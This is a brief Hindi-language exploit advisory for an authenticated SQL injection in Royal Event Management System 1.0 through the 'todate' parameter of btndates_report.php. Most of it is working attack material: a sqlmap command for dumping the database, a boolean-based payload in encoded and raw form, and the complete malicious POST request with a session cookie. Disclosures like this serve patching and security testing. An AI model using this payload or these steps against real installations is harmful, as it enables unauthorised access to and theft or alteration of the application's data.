
रॉयल इवेंट प्रबंधन प्रणाली 1.0 के लिए 'todate' पैरामीटर के माध्यम से प्रमाणित SQL इंजेक्शन शोषण, प्रूफ-ऑफ-कॉन्सेप्ट पेलोड और डेटाबेस निष्कर्षण के लिए SQLmap एकीकरण के साथ।
रॉयल इवेंट मैनेजमेंट सिस्टम 1.0 /royal_event/btndates_report.php#?= में 'todate' पैरामीटर के माध्यम से SQL इंजेक्शन की अनुमति देता है। इस मुद्दे का दोहन करके एक हमलावर एप्लिकेशन से समझौता कर सकता है, डेटा तक पहुंच सकता है या उसे संशोधित कर सकता है, या अंतर्निहित डेटाबेस में छिपी कमजोरियों का फायदा उठा सकता है।
Burpsuite में प्रभावित पृष्ठ से 'todate' पैरामीटर के साथ अनुरोध को इंटरसेप्ट करें और इसे poc.txt के रूप में सहेजें। फिर डेटाबेस से डेटा निकालने के लिए SQLmap चलाएँ:
sqlmap -r poc.txt --dbms=mysql
(बूलियन-आधारित)
-1%27+OR+1%3d1+OR+%27ns%27%3d%27ns
POST /royal_event/btndates_report.php#?= HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 334
Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0
Cookie: PHPSESSID=qeoe141g7guakhacf152a3i380
Referer: http://localhost/royal_event/btndates_report.php#?=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
--f289a6438bcc45179bcd3eb7ddc555d0
Content-Disposition: form-data; name="todate"
-1' OR 1=1 OR 'ns'='ns
--f289a6438bcc45179bcd3eb7ddc555d0
Content-Disposition: form-data; name="search"
3
--f289a6438bcc45179bcd3eb7ddc555d0
Content-Disposition: form-data; name="fromdate"
01/01/2011
--f289a6438bcc45179bcd3eb7ddc555d0--